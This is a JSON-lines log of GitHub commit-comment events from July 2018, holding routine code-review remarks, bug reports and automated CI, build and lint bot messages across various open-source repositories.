{"id":"8024392086","type":"CommitCommentEvent","actor":{"login":"arturojain"},"repo":{"name":"ivmartel/dwv"},"payload":{"comment":{"id":29848021,"position":null,"line":null,"path":null,"commit_id":"fbe67cae133afbfffb2741c2a7c3be68c23e3882","created_at":"2018-07-26T18:18:23Z","updated_at":"2018-07-26T18:18:23Z","author_association":"NONE","body":"@ivmartel I'm trying to load a jpeg file and I'm still getting an error if the file is not a DICOM."}},"created_at":"2018-07-26T18:18:23Z"}
{"id":"8024395424","type":"CommitCommentEvent","actor":{"login":"Rusty-Box"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29848028,"position":null,"line":null,"path":null,"commit_id":"b80043ab648f7035c427120010bfb282ceff71f6","created_at":"2018-07-26T18:19:05Z","updated_at":"2018-07-26T18:19:05Z","author_association":"MEMBER","body":"The additional sound is not supposed to play at all after collecting the egg power up."}},"created_at":"2018-07-26T18:19:05Z"}
{"id":"8024395630","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848029,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-26T18:19:08Z","updated_at":"2018-07-26T18:19:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:19:08Z"}
{"id":"8024396012","type":"CommitCommentEvent","actor":{"login":"Chris2fourlaw"},"repo":{"name":"Team973/greybots-signin"},"payload":{"comment":{"id":29848030,"position":null,"line":null,"path":null,"commit_id":"03eb75f5503a41dbdcf1e7aa539d61aefaef399a","created_at":"2018-07-26T18:19:13Z","updated_at":"2018-07-26T18:19:13Z","author_association":"COLLABORATOR","body":"Revoked"}},"created_at":"2018-07-26T18:19:13Z"}
{"id":"8024396351","type":"CommitCommentEvent","actor":{"login":"DianaOlvera"},"repo":{"name":"marfloresrayon/cdmx-2018-06-bc-core-am-social-network"},"payload":{"comment":{"id":29848034,"position":null,"line":null,"path":null,"commit_id":"c124a1c2bf95c96eb55b3ed96a3fc0bdd8601ad1","created_at":"2018-07-26T18:19:17Z","updated_at":"2018-07-26T18:19:17Z","author_association":"COLLABORATOR","body":"commit creado por Diana Olvera"}},"created_at":"2018-07-26T18:19:17Z"}
{"id":"8024401773","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848038,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-26T18:20:22Z","updated_at":"2018-07-26T18:20:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:20:22Z"}
{"id":"8024405311","type":"CommitCommentEvent","actor":{"login":"AbdulMoizZahid"},"repo":{"name":"AbdulMoizZahid/MobAppDev"},"payload":{"comment":{"id":29848045,"position":null,"line":null,"path":null,"commit_id":"491c3cd6297d129d089126f9cf0d2b9c44f603b1","created_at":"2018-07-26T18:21:03Z","updated_at":"2018-07-26T18:21:03Z","author_association":"OWNER","body":"![capture](https://user-images.githubusercontent.com/40694722/43280531-f608e2ba-90c5-11e8-85c0-590402ad2bf1.JPG)\r\n"}},"created_at":"2018-07-26T18:21:03Z"}
{"id":"8024407455","type":"CommitCommentEvent","actor":{"login":"vovkasm"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29848052,"position":null,"line":null,"path":null,"commit_id":"52a55fd8d106a15c72671475115c2ebe1f3ee57e","created_at":"2018-07-26T18:21:28Z","updated_at":"2018-07-26T18:21:28Z","author_association":"NONE","body":"@hramos Sorry, not mind to disrupt anyone... I'm worry that those commits where made by mistake, because they are not used in OSS (at least at first glance) and commit messages does not describe situation at all... so for open source repository these commits looks like mistakes... moreover I was worried that this is mistake in the configuration of this bot, so it can be missed by facebook devs... So it whats from my words come to...\r\nSorry again. And thank you for looking into it!"}},"created_at":"2018-07-26T18:21:28Z"}
{"id":"8024407954","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848054,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-26T18:21:34Z","updated_at":"2018-07-26T18:21:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:21:34Z"}
{"id":"8024407985","type":"CommitCommentEvent","actor":{"login":"don57hpe"},"repo":{"name":"don57hpe/rift-fsm"},"payload":{"comment":{"id":29848055,"position":null,"line":null,"path":null,"commit_id":"7810479ae8e5c658ca968ef78e3aaa640ec27869","created_at":"2018-07-26T18:21:34Z","updated_at":"2018-07-26T18:21:34Z","author_association":"OWNER","body":"Syncing with Master"}},"created_at":"2018-07-26T18:21:34Z"}
{"id":"8024409040","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29848059,"position":18,"line":48,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/GroupListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T18:21:46Z","updated_at":"2018-07-26T18:21:46Z","author_association":"COLLABORATOR","body":"Xcode так себе форматирует, нужно руками."}},"created_at":"2018-07-26T18:21:46Z"}
{"id":"8024409237","type":"CommitCommentEvent","actor":{"login":"DianaOlvera"},"repo":{"name":"marfloresrayon/cdmx-2018-06-bc-core-am-social-network"},"payload":{"comment":{"id":29848060,"position":null,"line":null,"path":null,"commit_id":"1770bfb8d1bc26ffeeadfc240f46b731bc9e845b","created_at":"2018-07-26T18:21:48Z","updated_at":"2018-07-26T18:21:48Z","author_association":"COLLABORATOR","body":"commit creado por Diana Olvera"}},"created_at":"2018-07-26T18:21:48Z"}
{"id":"8024409597","type":"CommitCommentEvent","actor":{"login":"lain566"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29848062,"position":null,"line":null,"path":null,"commit_id":"04a25dccd88f92a457cac261b60e3c06c7082afe","created_at":"2018-07-26T18:21:53Z","updated_at":"2018-07-26T18:21:53Z","author_association":"NONE","body":"This rule is breaking the video player\r\n`@@/advertisement.js$domain=atresplayer.com`\r\n\r\nTest link [You'll need a Spain VPN]\r\n`https://www.atresplayer.com/directos/lasexta/`\r\n"}},"created_at":"2018-07-26T18:21:53Z"}
{"id":"8024412114","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29848064,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T18:22:24Z","updated_at":"2018-07-26T18:22:24Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T18:22:24Z"}
{"id":"8024413176","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29848068,"position":47,"line":50,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/PurchaseListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T18:22:35Z","updated_at":"2018-07-26T18:22:35Z","author_association":"COLLABORATOR","body":"Я обычно 1-2 колбека делаю замыканиями, больше — думаю про делегат. Делегат размывает конфигурирование. Часть — тут, часть — в методах где-то. Это менее наглядно."}},"created_at":"2018-07-26T18:22:35Z"}
{"id":"8024414158","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848073,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-26T18:22:46Z","updated_at":"2018-07-26T18:22:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:22:46Z"}
{"id":"8024450253","type":"CommitCommentEvent","actor":{"login":"aquaplanet"},"repo":{"name":"aquaplanet/qmk_firmware"},"payload":{"comment":{"id":29848155,"position":null,"line":null,"path":null,"commit_id":"99fde5d21ae2a20133b1d8401d422ea0c05c62ea","created_at":"2018-07-26T18:29:38Z","updated_at":"2018-07-26T18:29:38Z","author_association":"OWNER","body":"Closes #11"}},"created_at":"2018-07-26T18:29:38Z"}
{"id":"8024450927","type":"CommitCommentEvent","actor":{"login":"baerkins"},"repo":{"name":"bluecadet/greene-space"},"payload":{"comment":{"id":29848156,"position":null,"line":null,"path":null,"commit_id":"ce1c23b613e9445381314102f2e51fa6c1d950be","created_at":"2018-07-26T18:29:47Z","updated_at":"2018-07-26T18:29:47Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-37-greene-space.pantheonsite.io/)\n\nCreated multidev environment [ci-37](https://dashboard.pantheon.io/sites/1ffe8818-30b8-4947-851f-e8a90715b486#ci-37) for greene-space."}},"created_at":"2018-07-26T18:29:47Z"}
{"id":"8024452802","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848164,"position":10,"line":270,"path":"file.c","commit_id":"e5d16c637a330434d9ebc4212f74e3bdca0e9596","created_at":"2018-07-26T18:30:08Z","updated_at":"2018-07-26T18:30:08Z","author_association":"NONE","body":"remove this whitespace change"}},"created_at":"2018-07-26T18:30:08Z"}
{"id":"8024454241","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848171,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-26T18:30:22Z","updated_at":"2018-07-26T18:30:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:30:22Z"}
{"id":"8024454904","type":"CommitCommentEvent","actor":{"login":"goofansu"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29848172,"position":7,"line":846,"path":"lib/elixir/test/elixir/kernel/errors_test.exs","commit_id":"c85419fda72509c08a67bb0016fa878f90aed6f6","created_at":"2018-07-26T18:30:30Z","updated_at":"2018-07-26T18:30:30Z","author_association":"CONTRIBUTOR","body":"Is \"definition header\" be \"function head\" here?"}},"created_at":"2018-07-26T18:30:30Z"}
{"id":"8024455247","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848174,"position":1,"line":267,"path":"file.c","commit_id":"e5d16c637a330434d9ebc4212f74e3bdca0e9596","created_at":"2018-07-26T18:30:34Z","updated_at":"2018-07-26T18:30:34Z","author_association":"NONE","body":"Have this commit come first, since the main commit depends on it"}},"created_at":"2018-07-26T18:30:34Z"}
{"id":"8024457222","type":"CommitCommentEvent","actor":{"login":"laurenwalker"},"repo":{"name":"NCEAS/metacatui"},"payload":{"comment":{"id":29848177,"position":null,"line":null,"path":null,"commit_id":"038589ed7c6719f3337bd3affbcabeaf629baeca","created_at":"2018-07-26T18:30:56Z","updated_at":"2018-07-26T18:30:56Z","author_association":"MEMBER","body":"Looks good to me - thanks for adding this"}},"created_at":"2018-07-26T18:30:56Z"}
{"id":"8024457844","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848179,"position":1,"line":267,"path":"file.c","commit_id":"e5d16c637a330434d9ebc4212f74e3bdca0e9596","created_at":"2018-07-26T18:31:03Z","updated_at":"2018-07-26T18:31:03Z","author_association":"NONE","body":"Keep the first line of the commit message short, under 50 characters if possible, then have a blank line follow it, then a longer description. I try to follow the advice here: https://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html"}},"created_at":"2018-07-26T18:31:03Z"}
{"id":"8024457912","type":"CommitCommentEvent","actor":{"login":"codacy-bot"},"repo":{"name":"thoth-station/sesheta"},"payload":{"comment":{"id":29848180,"position":null,"line":null,"path":null,"commit_id":"1ae24d93639f83fda253d8190afdc363dfb3e57b","created_at":"2018-07-26T18:31:04Z","updated_at":"2018-07-26T18:31:04Z","author_association":"NONE","body":"### [Codacy](https://app.codacy.com/app/goern/sesheta/commit?cid=228297701) detected an issue:\n#### Message: `Unused import os`\n\n    \n#### Occurred on:\n+ **Commit**:  1ae24d93639f83fda253d8190afdc363dfb3e57b\n+ **File**:    [sesheta/humans.py](https://github.com/thoth-station/sesheta/blob/1ae24d93639f83fda253d8190afdc363dfb3e57b/sesheta/humans.py)\n+ **LineNum**: [22](https://github.com/thoth-station/sesheta/blob/1ae24d93639f83fda253d8190afdc363dfb3e57b/sesheta/humans.py#L22)\n+ **Code**:    `import os`\n\n    \n#### Currently on:\n+ **Commit**:  e5181b1db20bc5e16cd0e3445065db4ed1fb49e8\n+ **File**:    [sesheta/humans.py](https://github.com/thoth-station/sesheta/blob/e5181b1db20bc5e16cd0e3445065db4ed1fb49e8/sesheta/humans.py)\n+ **LineNum**: [22](https://github.com/thoth-station/sesheta/blob/e5181b1db20bc5e16cd0e3445065db4ed1fb49e8/sesheta/humans.py#L22)\n    "}},"created_at":"2018-07-26T18:31:04Z"}
{"id":"8024458472","type":"CommitCommentEvent","actor":{"login":"Milinai"},"repo":{"name":"Milinai/Mindustry"},"payload":{"comment":{"id":29848183,"position":4,"line":4,"path":"core/assets/bundles/bundle_se.properties","commit_id":"dc8947c4c9cc758b25975f561981c2d6d579fdeb","created_at":"2018-07-26T18:31:11Z","updated_at":"2018-07-26T18:31:11Z","author_association":"OWNER","body":"Ändra?"}},"created_at":"2018-07-26T18:31:11Z"}
{"id":"8024460586","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848189,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-26T18:31:36Z","updated_at":"2018-07-26T18:31:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:31:36Z"}
{"id":"8024466978","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848206,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-26T18:32:48Z","updated_at":"2018-07-26T18:32:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:32:48Z"}
{"id":"8024468919","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29848211,"position":null,"line":null,"path":null,"commit_id":"2acad21f51fa93e00be42aa5e1fab947a0a13127","created_at":"2018-07-26T18:33:12Z","updated_at":"2018-07-26T18:33:12Z","author_association":"OWNER","body":"above feedback addressed in a7fb207"}},"created_at":"2018-07-26T18:33:12Z"}
{"id":"8024469860","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29848213,"position":null,"line":null,"path":null,"commit_id":"c8ffbf73d32d0702543e9c6aa84c835c2778518c","created_at":"2018-07-26T18:33:23Z","updated_at":"2018-07-26T18:33:23Z","author_association":"OWNER","body":"above feedback addressed in a7fb207"}},"created_at":"2018-07-26T18:33:23Z"}
{"id":"8024472828","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848220,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-26T18:34:00Z","updated_at":"2018-07-26T18:34:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:34:00Z"}
{"id":"8024473135","type":"CommitCommentEvent","actor":{"login":"bkendzior"},"repo":{"name":"mightymorphism/docker-make"},"payload":{"comment":{"id":29848221,"position":177,"line":234,"path":"mk/scripts/docker-tag-wrapper","commit_id":"2fa98ca803faf6d3e9a6643189f288c05fb6827a","created_at":"2018-07-26T18:34:04Z","updated_at":"2018-07-26T18:34:04Z","author_association":"NONE","body":"When manifest is nil here, we get some odd errors"}},"created_at":"2018-07-26T18:34:04Z"}
{"id":"8024475990","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848224,"position":4,"line":47,"path":"epan/epan.h","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T18:34:39Z","updated_at":"2018-07-26T18:34:39Z","author_association":"NONE","body":"Use /* style */ comments for consistency\r\n"}},"created_at":"2018-07-26T18:34:39Z"}
{"id":"8024479068","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848231,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-26T18:35:15Z","updated_at":"2018-07-26T18:35:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:35:15Z"}
{"id":"8024483745","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29848245,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-26T18:36:11Z","updated_at":"2018-07-26T18:36:11Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - i386-Windows-7-VisualStudio-14: OK (2924 of 2924 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T18:36:11Z"}
{"id":"8024484588","type":"CommitCommentEvent","actor":{"login":"KarbonKitty"},"repo":{"name":"KarbonKitty/sheep-incremental"},"payload":{"comment":{"id":29848246,"position":null,"line":null,"path":null,"commit_id":"a8a9e0ff4c4476d50a8229dfcef2ca9ed14f31c3","created_at":"2018-07-26T18:36:21Z","updated_at":"2018-07-26T18:36:21Z","author_association":"OWNER","body":"For now, I've just pushed a new commit with storage in microlith workshop and shed; I'll probably keep it that way, either with free storage in sheds, or with upgrade for sheds that adds microlith storage. I'd rather not add too many storage buildings - they aren't as interesting as producers - so if I add any, they will probably be related to other branches."}},"created_at":"2018-07-26T18:36:21Z"}
{"id":"8024485161","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848247,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-26T18:36:28Z","updated_at":"2018-07-26T18:36:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:36:28Z"}
{"id":"8024485553","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848250,"position":62,"line":335,"path":"epan/packet.c","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T18:36:33Z","updated_at":"2018-07-26T18:36:33Z","author_association":"NONE","body":"This comment feels more like it should be in the commit message, maybe a slightly different comment could be here too but it should be right above the line following the next one"}},"created_at":"2018-07-26T18:36:33Z"}
{"id":"8024485771","type":"CommitCommentEvent","actor":{"login":"txqzzz"},"repo":{"name":"txqzzz/CMDCalendar"},"payload":{"comment":{"id":29848251,"position":74,"line":315,"path":"CMDCalendar/CMDCalendar/MainPage.xaml.cs","commit_id":"6b4c65c6972d94de2df7866959c90dec071c25d5","created_at":"2018-07-26T18:36:36Z","updated_at":"2018-07-26T18:36:36Z","author_association":"OWNER","body":"* this local varaible should be named as _selectedItem;\r\n* Please do code inspect the next time when you finish your code! 👍 "}},"created_at":"2018-07-26T18:36:36Z"}
{"id":"8024486998","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"ubccpsc/classy"},"payload":{"comment":{"id":29848256,"position":32,"line":284,"path":"packages/portal/backend/src/server/common/AuthRoutes.ts","commit_id":"1645f2d282da50f24569d69342950ef10589529b","created_at":"2018-07-26T18:36:50Z","updated_at":"2018-07-26T18:36:50Z","author_association":"CONTRIBUTOR","body":"@nickbradley this was key! I'll bring it back."}},"created_at":"2018-07-26T18:36:50Z"}
{"id":"8024488526","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848259,"position":4,"line":1480,"path":"rawshark.c","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T18:37:10Z","updated_at":"2018-07-26T18:37:10Z","author_association":"NONE","body":"tack on a trailing comma\r\n"}},"created_at":"2018-07-26T18:37:10Z"}
{"id":"8024490173","type":"CommitCommentEvent","actor":{"login":"txqzzz"},"repo":{"name":"txqzzz/CMDCalendar"},"payload":{"comment":{"id":29848263,"position":null,"line":null,"path":null,"commit_id":"6b4c65c6972d94de2df7866959c90dec071c25d5","created_at":"2018-07-26T18:37:27Z","updated_at":"2018-07-26T18:37:27Z","author_association":"OWNER","body":"In fact I connot  tell what is the difference between this FETCH_HEAD and former one."}},"created_at":"2018-07-26T18:37:27Z"}
